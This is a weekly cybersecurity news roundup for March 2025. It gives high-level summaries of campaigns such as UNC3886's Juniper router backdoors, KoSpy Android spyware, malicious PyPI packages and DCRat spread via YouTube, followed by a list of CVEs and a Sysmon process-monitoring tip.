This week’s global cybersecurity roundup shows just how fast things are moving on both sides of the cyber battlefield. On one end, threat actors are breaking into outdated routers, sneaking into app stores, and spreading malware through trusted platforms like YouTube and GitHub.
On the other end, researchers are building new decryptors, governments are pressing charges, and security vendors are tightening controls.
Here’s your in-depth look at the stories shaping cyber defense and offense for March 2025.
China-Linked UNC3886 Breaches End-of-Life Juniper Routers
Old routers are still powering networks—and attackers know it
One of the biggest threats this week came from UNC3886, a Chinese advanced persistent threat (APT) group. They targeted outdated Juniper Networks MX Series routers, specifically those no longer receiving updates.
With a mix of six custom backdoors, they gained full access to less than ten global organizations. These backdoors included tools that could disable logs, sneak commands through hidden scripts, and even act silently in the background.
At least one exploited flaw, CVE-2025-21590, allowed the group to sidestep built-in protections and run code remotely. The campaign serves as a serious warning to organizations still relying on end-of-life hardware.
ClickFix Tactic Used in New Phishing Campaign
Phishing just got more dangerous—with stolen logins and drained accounts
A group called Storm-1865 is tricking people with fake Booking.com emails, directing them to credential-harvesting pages. The twist? They’re using a technique known as ClickFix, which abuses legitimate links to bypass security filters.
This campaign, running since late 2024, has spread across nearly every continent. Victims who fall for the scheme have their login details and financial data stolen, which is then used in follow-up fraud operations.
KoSpy Malware Found in Android Apps on Google Play
North Korean actors sneak spying tools into your phone under the guise of utilities
The ScarCruft group, tied to North Korea, uploaded apps to the Google Play Store that looked like harmless tools. In reality, these apps installed KoSpy, a surveillance malware that could steal:
- Text messages
- Call history
- Files
- Locations
- Audio recordings
- Screenshots
Though the apps have been removed, the campaign traces back to 2022, showing how persistent these threat actors are at embedding spyware into trusted ecosystems.
SideWinder Targets Maritime and Logistics Companies
This APT is going after shipping and supply chains worldwide
Another group, known as SideWinder, has been hitting logistics firms in Asia, the Middle East, and Africa. Using a post-infection toolkit called StealerBot, the group grabs login data, internal communications, and proprietary logistics data.
Their focus on the maritime sector suggests an interest in tracking movements of goods, port infrastructure, or sensitive cargo.
LockBit Ransomware Developer Extradited to the U.S.
Cybercrime isn’t anonymous forever—justice catches up
In a big win for law enforcement, Rostislav Panev, a developer behind the LockBit ransomware group, was extradited from Israel to face charges in the United States. Between 2022 and early 2024, he reportedly earned over $230,000 from LockBit attacks.
His arrest came after authorities took down key parts of the group’s infrastructure. His prosecution may help build more cases against others involved in similar operations.
PyPI Supply Chain Attack Reveals 20 Malicious Packages
Fake packages can poison your codebase without warning
Researchers discovered 20 malicious Python packages uploaded to PyPI, disguised as useful developer tools. These packages were downloaded more than 14,000 times before removal.
Some of them were used by a popular GitHub project called accesskey_tools, which had hundreds of stars and dozens of forks—showing how easily malware can spread through trusted dev ecosystems.
Critical CVEs to Patch Right Now
Outdated software is a hacker’s best friend—update now
This week’s top vulnerabilities include critical flaws in systems from Microsoft, Apple, Apache, Cisco, TP-Link, and others. Some of the most urgent include:
- CVE-2025-26633 (Windows)
- CVE-2025-25291 & 25292 (ruby-saml)
- CVE-2024-13871 & 13872 (Bitdefender BOX v1)
- CVE-2025-27816 (Arctera InfoScale)
- CVE-2025-27017 (Apache NiFi)
- CVE-2025-27593 (SICK DL100 series)
- CVE-2025-27509 (Fleet software)
Check your systems and apply these patches to prevent remote code execution, privilege escalation, and data theft.
Positive News: New Ransomware Decryptor for Akira Linux Variant
Not all hope is lost—researchers strike back
A researcher named Yohanes Nugroho has released a decryptor for the Linux version of Akira ransomware, giving victims a chance to unlock their data without paying.
This tool leverages GPU power to retrieve the encryption keys and is freely available on GitHub. It’s a powerful reminder that the cyber community can fight back with the right tools and dedication.
Chinese Volt Typhoon Hackers Infiltrated U.S. Electric Company
A near year-long breach with physical infrastructure risks
The Volt Typhoon group, believed to be Chinese state-sponsored hackers, stayed inside a U.S. electric utility network for over 300 days. The breach was discovered just before Thanksgiving 2023.
Although no customer data was compromised, the attackers explored systems tied to energy operations and OT networks. They entered through a buggy Fortinet firewall used by a third-party provider.
The long-term goal appears to be strategic sabotage, should tensions between China and the U.S. escalate.
YouTube Used to Spread DCRat Backdoor
Gamers become victims again through fake cheat downloads
The Dark Crystal RAT (DCRat) is making a comeback via YouTube. Attackers create or hijack accounts to post videos advertising game hacks and bots. Once users click on the links in the video description, malware is downloaded.
DCRat allows attackers to record keystrokes, steal passwords, activate webcams, and more. Kaspersky identified over 34 plug-ins for this malware and tracked its activity mainly in Russia, Belarus, and Kazakhstan.
New Threat: OAuth App Phishing for Microsoft 365
Fake login apps fool users into giving full access to attackers
Proofpoint reported two targeted phishing campaigns using fake OAuth apps disguised as Adobe and Docusign tools. These apps trick users into granting permissions, which attackers then use to take over Microsoft 365 accounts.
This method allows access without needing a password and can evade traditional email security filters.
Wi-Fi Jamming Gets Laser Precision
RIS-based jamming can knock out devices without affecting others
Researchers have created a precise Wi-Fi jamming method using Reconfigurable Intelligent Surfaces (RIS). This tech lets attackers disable a single device’s connection while leaving nearby systems untouched.
It’s like jamming with a sniper scope—perfect for targeted denial-of-service attacks on sensitive equipment.
Other Notable Headlines
- Jupyter Notebooks are being targeted for cryptomining
- ESP32 chip controversy shows the risks of debug commands becoming backdoors
- Switzerland now requires critical infrastructure providers to report cyberattacks within 24 hours
- BYOVD evolves into BYOTB and BYOVE, with attackers abusing legit drivers, binaries, and even trusted enclaves
- NIST adds HQC as a backup post-quantum cryptography algorithm for future threats
- Mandiant flags concerns over Microsoft’s Time Travel Debugging framework potentially masking vulnerabilities
Tip of the Week: Monitor for Suspicious Processes Using Sysmon
Detect threats early by watching how programs launch
Use Sysmon and Windows Event ID 4688 to monitor the launch of uncommon or risky tools like rundll32.exe or certutil.exe. Combine this with a free SIEM like ELK or Graylog for real-time alerts.
Set up process auditing through Group Policy and use trusted community configurations for Sysmon to reduce noise and focus on real threats.
Final Thoughts
The key message this week? Cyber threats are no longer hiding in the shadows—they’re hiding in plain sight. Whether it’s a gaming video, a cloud tool, or a legacy router, the entry points for attackers are everywhere.
But defenders are not powerless. With the right tools, community collaboration, and a proactive mindset, we can uncover hidden threats, respond faster, and shut down attackers before they cause real damage.
Stay alert, stay informed, and never stop learning—because the next threat is already in motion.
